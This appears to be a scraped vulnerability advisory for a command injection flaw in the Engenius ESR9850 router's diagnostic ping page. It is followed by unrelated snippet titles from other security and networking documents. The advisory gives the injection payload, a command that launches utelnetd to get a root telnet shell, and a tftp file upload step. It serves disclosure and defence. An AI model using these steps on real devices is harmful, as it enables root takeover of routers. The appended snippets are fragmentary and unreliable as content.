2 Description: The Engenius ESR9850 Wireless Router is vulnerable to 'command injection' via the device's web administrative interface. Arbitrary commands can be executed and the outputs of injected commands can be observed partially (only a single line) from the HTTP response. In addition, due to the availability of the 'utelnetd' binary present in the device, a telnet service can be invoked through this command injection vulnerability and subsequently be connected via port 23 to a gain root shell access without requiring further authentication. This vulnerability requires authenticated access (HTTP basic authentication) to the web administrative interface. *There is an option which allows administrative access through the internet via port 8080 but this has to be manually turned on by the administrator. By default, the web interface can only be accessed locally. When the option is enabled, the risk rating increases significantly. Impact: An attacker could gain full administrative access (root) to the embedded operating system running Busybox on Linux kernel This allows the attacker to perform privileged actions beyond the device s web administrative interface. Cause: The URL that is vulnerable to command injection is located at and the affected parameter is 'diagipaddr'. The intended design of the page is to allow users to perform 'ping' action for diagnostic purposes. Although the page contains JavaScript to disallow user from submitting any other form of inputs except for an IP address, the HTTP request can be intercepted to bypass the client-side check. In addition, there is a lack of server-side validation on the diagipaddr parameter and the untrusted input is placed in-line with the shell statement. As a result, command injection can be achieved by appending ';' to the back of the normal input (in this case, an IP address) and followed by an arbitrary Linux command. Interim Workaround: Ensure that access to web administrative interface is protected with a strong password that is at least 12 characters long and contains at least once of every following instance: A uppercase alphabet 2

3 A lowercase alphabet A number A special character In addition, use HTTPS to prevent Man-in-the-Middle attack that could compromise the credentials intransit between the administrator and the router. Solution: No official fix at this point in time. It should also be noted that the product has been discontinued. 3

5 3. Append the parameter diagipaddr with ;ls+-al. You should observe the ls is successful with partial results (only a single line) in the HTTP response. FURTHER INFORMATION: Due to limited verbosity and flexibility, a full shell is much desired. Perform grep v e expression1 e expression2... (grep inverse select) and recursively ls al the directory in order to gain information of the directory contents. 5

6 4. Using information obtained, a utelnetd binary is discovered at the following directory: /apps/sbin/utelnetd Launch the telnet service by giving the command: /apps/sbin/utelnetd start 5. After about 5-10 seconds, re-perform an NMAP scan against and a new service is to be discovered telnet 23/tcp. FURTHER INFORMATION A further inspection indicated that the HTTP server is running at root privileges. Spawning the utelnetd using root privileges which eventually yielded a root shell via telnet service. 6

7 6. Connect to the telnet service using telnet You should observe that the telnet shell is running at UID 0 (or at root privileges). 7. Upload of files is possible by setting up a TFTP server and invoking tftp g r filename.txt server_ip to transfer files into this device. 7

8 8. To verify your firmware, go to /tmp and perform cat fw_version. 9. Firmware currently installed is V Latest available firmware is V2.1.4 (as of ), however, command injection is not part of the documented list of fixes. Changelog downloaded on

HACKING EMBEDDED DEVICES for Fun & Profit WHAT THIS TALK INTENDS TO COVER! What & Where are Embedded Devices? Why history lessons should be learnt! Caveats & Defects in Embedded Platforms Methodologies

Page 1 of 6 My FreeScan Vulnerabilities Report Print Help For 66.40.6.179 on Feb 07, 008 Thank you for trying FreeScan. Below you'll find the complete results of your scan, including whether or not the

CMSC 355 Lab 3 : Penetration Testing Tools Due: September 31, 2010 In the previous lab, we used some basic system administration tools to figure out which programs where running on a system and which files

Data Transfer Many programs use a disk file paradigm for I/O. Before networks, transferring data from one computer to another required the use of a removable medium (disk or tape) and the sneakernet. A

CIT 380 Project Network Security Assessment Due: April 30, 2014 This project is a security assessment of a small group of systems. In this assessment, students will apply security tools and resources learned

Running commands on other computers and transferring files between computers 1 1 Remote Login Login to remote computer and run programs on that computer Once logged in to remote computer, everything you

IBM Security QRadar SIEM Version 7.1.0 MR1 Vulnerability Assessment Configuration Guide Note: Before using this information and the product that it supports, read the information in Notices and Trademarks

"EZHACK" POPULAR SMART TV DONGLE REMOTE CODE EXECUTION CHECK POINT ALERTED EZCAST THAT ITS SMART TV DONGLE, WHICH IS USED BY APPROXIMATELY 5 MILLION USERS, IS EXPOSED TO SEVERE REMOTE CODE EXECUTION VULNERABILITIES

Smartphone Pentest Framework v0.1 User Guide 1 Introduction: The Smartphone Pentest Framework (SPF) is an open source tool designed to allow users to assess the security posture of the smartphones deployed

IDS and Penetration Testing Lab II Software Requirements: 1. A secure shell (SSH) client. For windows you can download a free version from here: http://the.earth.li/~sgtatham/putty/latest/x86/putty-0.62-

How to hack a website with Metasploit By Sumedt Jitpukdebodin Normally, Penetration Tester or a Hacker use Metasploit to exploit vulnerability services in the target server or to create a payload to make

Chapter 6 Using Network Monitoring Tools This chapter describes how to use the maintenance features of your RangeMax Wireless-N Gigabit Router WNR3500. You can access these features by selecting the items

IP Phone Configuration and Troubleshooting Guide NetVanta 7000 Series and IP 700 Series Phones Overview The purpose of this guide: Explain the default configuration. Explain how to configure the NetVanta

Purpose: This procedure identifies what is required to ensure the development of a secure application. Procedure: The five basic areas covered by this document include: Standards for Privacy and Security

Q: How can I configure my TV-IP100 (C1) through the web-based configuration? A: Open your web browser and type the IP address of the TV-IP100 (C1) in the address bar. The default IP address is 192.168.0.20.

Security Guide BlackBerry Enterprise Service 12 for ios, Android, and Windows Phone Version 12.0 Published: 2015-02-06 SWD-20150206130210406 Contents About this guide... 6 What is BES12?... 7 Key features

COURSE NAME: INFORMATION SECURITY INTERNSHIP PROGRAM Course Description This is the Information Security Training program. The Training provides you Penetration Testing in the various field of cyber world.

Firewalls and Software Updates License This work by Z. Cliffe Schreuders at Leeds Metropolitan University is licensed under a Creative Commons Attribution-ShareAlike 3.0 Unported License. Contents General

Penetration Testing with Kali Linux PWK Copyright 2014 Offensive Security Ltd. All rights reserved. Page 1 of 11 All rights reserved to Offensive Security, 2014 No part of this publication, in whole or

White Paper Cisco Smart Care Service Security Cisco Smart Care Service is a managed service comprised of components that include a Cisco network appliance, a Windows-based Cisco software client, and partner

Reverse Shells Enable Attackers To Operate From Your Network Richard Hammer August 2006 Reverse Shells? Why should you care about reverse shells? How do reverse shells work? How do reverse shells get installed

èè WHMCS LUXCLOUD MODULE Update: 02.02.2015 Version 2.0 This information is only valid for partners who use the WHMCS module (v2.0 and higher). 1.1 General overview 1.2 Installing the plugin Go to your

Chapter 6 Using Network Monitoring Tools This chapter describes how to use the maintenance features of your RangeMax Dual Band Wireless-N Router WNDR3300. You can access these features by selecting the

Worms, Trojan Horses and Root Kits Worms A worm is a type of Virus that is capable of spreading and replicating itself autonomously over the internet. Famous Worms Morris Internet worm (1988) Currently: